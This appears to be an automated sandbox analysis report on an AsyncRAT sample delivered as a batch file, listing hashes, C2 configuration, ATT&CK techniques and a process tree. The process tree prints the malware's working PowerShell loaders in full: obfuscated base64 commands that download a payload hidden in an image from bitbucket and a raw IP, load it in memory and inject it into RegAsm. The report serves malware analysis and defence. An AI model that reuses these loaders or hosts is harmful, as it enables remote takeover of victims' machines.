asyncrat | 69474069c929065596f1c0ebda5f40a102dc5c4fe152da3d5e8e92210cf84f7d

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-12-2024 08:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

beac54161d73fc530e3bff90cb7f7f5e.bat
Size

13KB
MD5

beac54161d73fc530e3bff90cb7f7f5e
SHA1

0034230a87b352f1fab34211bd6691717ddbb68b
SHA256

69474069c929065596f1c0ebda5f40a102dc5c4fe152da3d5e8e92210cf84f7d
SHA512

fe4292896814ad4e60be94e5993c5ff85c8fe38215be32342775021fa9017b1fcce10f1a782509e341e740a3817f60108744317c920f2a6b57727f66c3050820
SSDEEP

192:O+UsWf/t0hVd43DsM7sBcv49xnvWhZIayGRX2X7WX1XCYAGZuapp39fRhNLmU7q/:SsScluCnV7340zeipmM

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

103.125.189.155:8848

Mutex

DcRatMutex_adxzvxv

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	3616	powershell.exe
15	3616	powershell.exe
22	3616	powershell.exe
24	1560	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1356	powershell.exe
3616	powershell.exe
1560	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beac54161d73fc530e3bff90cb7f7f5e.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beac54161d73fc530e3bff90cb7f7f5e.bat	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	bitbucket.org
9	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3616 set thread context of 4712	3616	powershell.exe	95

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3984	WINWORD.EXE
3984	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1356	powershell.exe
1356	powershell.exe
3616	powershell.exe
3616	powershell.exe
1560	powershell.exe
1560	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1028	WMIC.exe
Token: SeSecurityPrivilege	1028	WMIC.exe
Token: SeTakeOwnershipPrivilege	1028	WMIC.exe
Token: SeLoadDriverPrivilege	1028	WMIC.exe
Token: SeSystemProfilePrivilege	1028	WMIC.exe
Token: SeSystemtimePrivilege	1028	WMIC.exe
Token: SeProfSingleProcessPrivilege	1028	WMIC.exe
Token: SeIncBasePriorityPrivilege	1028	WMIC.exe
Token: SeCreatePagefilePrivilege	1028	WMIC.exe
Token: SeBackupPrivilege	1028	WMIC.exe
Token: SeRestorePrivilege	1028	WMIC.exe
Token: SeShutdownPrivilege	1028	WMIC.exe
Token: SeDebugPrivilege	1028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1028	WMIC.exe
Token: SeRemoteShutdownPrivilege	1028	WMIC.exe
Token: SeUndockPrivilege	1028	WMIC.exe
Token: SeManageVolumePrivilege	1028	WMIC.exe
Token: 33	1028	WMIC.exe
Token: 34	1028	WMIC.exe
Token: 35	1028	WMIC.exe
Token: 36	1028	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1028	WMIC.exe
Token: SeSecurityPrivilege	1028	WMIC.exe
Token: SeTakeOwnershipPrivilege	1028	WMIC.exe
Token: SeLoadDriverPrivilege	1028	WMIC.exe
Token: SeSystemProfilePrivilege	1028	WMIC.exe
Token: SeSystemtimePrivilege	1028	WMIC.exe
Token: SeProfSingleProcessPrivilege	1028	WMIC.exe
Token: SeIncBasePriorityPrivilege	1028	WMIC.exe
Token: SeCreatePagefilePrivilege	1028	WMIC.exe
Token: SeBackupPrivilege	1028	WMIC.exe
Token: SeRestorePrivilege	1028	WMIC.exe
Token: SeShutdownPrivilege	1028	WMIC.exe
Token: SeDebugPrivilege	1028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1028	WMIC.exe
Token: SeRemoteShutdownPrivilege	1028	WMIC.exe
Token: SeUndockPrivilege	1028	WMIC.exe
Token: SeManageVolumePrivilege	1028	WMIC.exe
Token: 33	1028	WMIC.exe
Token: 34	1028	WMIC.exe
Token: 35	1028	WMIC.exe
Token: 36	1028	WMIC.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	4712	RegAsm.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3984	WINWORD.EXE
3984	WINWORD.EXE
3984	WINWORD.EXE
3984	WINWORD.EXE
3984	WINWORD.EXE
3984	WINWORD.EXE
3984	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 1028	2564	cmd.exe	84
PID 2564 wrote to memory of 1028	2564	cmd.exe	84
PID 2564 wrote to memory of 3292	2564	cmd.exe	85
PID 2564 wrote to memory of 3292	2564	cmd.exe	85
PID 2564 wrote to memory of 1356	2564	cmd.exe	87
PID 2564 wrote to memory of 1356	2564	cmd.exe	87
PID 1356 wrote to memory of 3616	1356	powershell.exe	88
PID 1356 wrote to memory of 3616	1356	powershell.exe	88
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 3616 wrote to memory of 4712	3616	powershell.exe	95
PID 2564 wrote to memory of 1560	2564	cmd.exe	96
PID 2564 wrote to memory of 1560	2564	cmd.exe	96
PID 1560 wrote to memory of 3984	1560	powershell.exe	99
PID 1560 wrote to memory of 3984	1560	powershell.exe	99

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\beac54161d73fc530e3bff90cb7f7f5e.bat"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- C:\Windows\system32\find.exe
  find "QEMU"
  2⤵
  PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Go#ZgBn#Gs#ZgBn#Gg#Zg#v#HM#ZwBz#GQ#ZwBo#HM#Z#Bm#HM#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#Gc#LgBq#H##Zw#/#DE#Mw#0#DE#NQ#n#Cw#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DM#Lg#y#D##Lg#x#D##Mg#u#DY#Mg#v#G4#ZQB3#F8#aQBt#Gc#LgBq#H##Zw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#SQBk#GY#SQBn#Gs#QQ#v#DI#Ng#u#DI#M##x#C4#M##y#C4#Mw#w#DE#Lw#v#Do#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.IdfIgkA/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD2F42.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ocs5rexk.2fs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
347B

MD5
a87ebbe5f23815239b58ce43d4e3a9fe

SHA1
d7cdee3e2f3c14a84c7f64f09ce4293ff13b2b57

SHA256
8c73c92d39fec20a12136e1c2a5dd68c30a979238fd2d5dfc00f5bdb2a0e44a6

SHA512
dad347aab38b7d0d8ae7942cd32234829f5171909a3a1c089e60873f3d772973948f69ee1fb04c98ed85e5201d3f3d9854a8728acdf39ee6b2526b55907d2b7e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
c3382c757f8cffdc061dd26fe41b1a5c

SHA1
49d73e432cc09fe016ab51b52c9b9db3de0f2f27

SHA256
a011211940c8dbda80fd14ba29f82fd8b702566973ad14aa354ef7353d1a6b0e

SHA512
b2a063d80b0cfd2d4c2cdb171822d3219890d38f717c47d93b0f9576c0cea60f33a5fbbe9060e67a04b60987fa3e165a31aa00eeb2918593b0712fd162683157

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
4KB

MD5
15a750368768e21605ed33f19562d55b

SHA1
b45f8299e4b904a2ea8681adf56d5bbb3664d81a

SHA256
a127966a8e49c7cfeec8af763d6f94b86c070f1a1ec6ab9df945884b6c359548

SHA512
91c1f335394c1993918efd8ba688fc278610f8bd4cb80c4e0e78213aa40be5983284f310be5657d919808aaf779d906f171922b7263dab9137c2604f645ab5e4

Download Submit
C:\Users\Admin\AppData\Roaming\donhang.docx

Filesize
12KB

MD5
ff3620557b65e6e8dd8816643d785c5a

SHA1
d5021480b7cac2066462829c53dc18615642c579

SHA256
85225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9

SHA512
c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34

Download Submit
memory/1356-23-0x00007FFF28EB3000-0x00007FFF28EB5000-memory.dmp

Filesize
8KB

Download
memory/1356-0-0x00007FFF28EB3000-0x00007FFF28EB5000-memory.dmp

Filesize
8KB

Download
memory/1356-30-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

Filesize
10.8MB

Download
memory/1356-10-0x00000224C4860000-0x00000224C4882000-memory.dmp

Filesize
136KB

Download
memory/1356-11-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

Filesize
10.8MB

Download
memory/1356-12-0x00007FFF28EB0000-0x00007FFF29971000-memory.dmp

Filesize
10.8MB

Download
memory/3616-22-0x000002CDB7610000-0x000002CDB7622000-memory.dmp

Filesize
72KB

Download
memory/3984-54-0x00007FFF04DB0000-0x00007FFF04DC0000-memory.dmp

Filesize
64KB

Download
memory/3984-53-0x00007FFF04DB0000-0x00007FFF04DC0000-memory.dmp

Filesize
64KB

Download
memory/3984-52-0x00007FFF076B0000-0x00007FFF076C0000-memory.dmp

Filesize
64KB

Download
memory/3984-51-0x00007FFF076B0000-0x00007FFF076C0000-memory.dmp

Filesize
64KB

Download
memory/3984-49-0x00007FFF076B0000-0x00007FFF076C0000-memory.dmp

Filesize
64KB

Download
memory/3984-50-0x00007FFF076B0000-0x00007FFF076C0000-memory.dmp

Filesize
64KB

Download
memory/3984-48-0x00007FFF076B0000-0x00007FFF076C0000-memory.dmp

Filesize
64KB

Download
memory/4712-24-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4712-79-0x0000000005C10000-0x0000000005CAC000-memory.dmp

Filesize
624KB

Download
memory/4712-80-0x0000000006260000-0x0000000006804000-memory.dmp

Filesize
5.6MB

Download
memory/4712-81-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download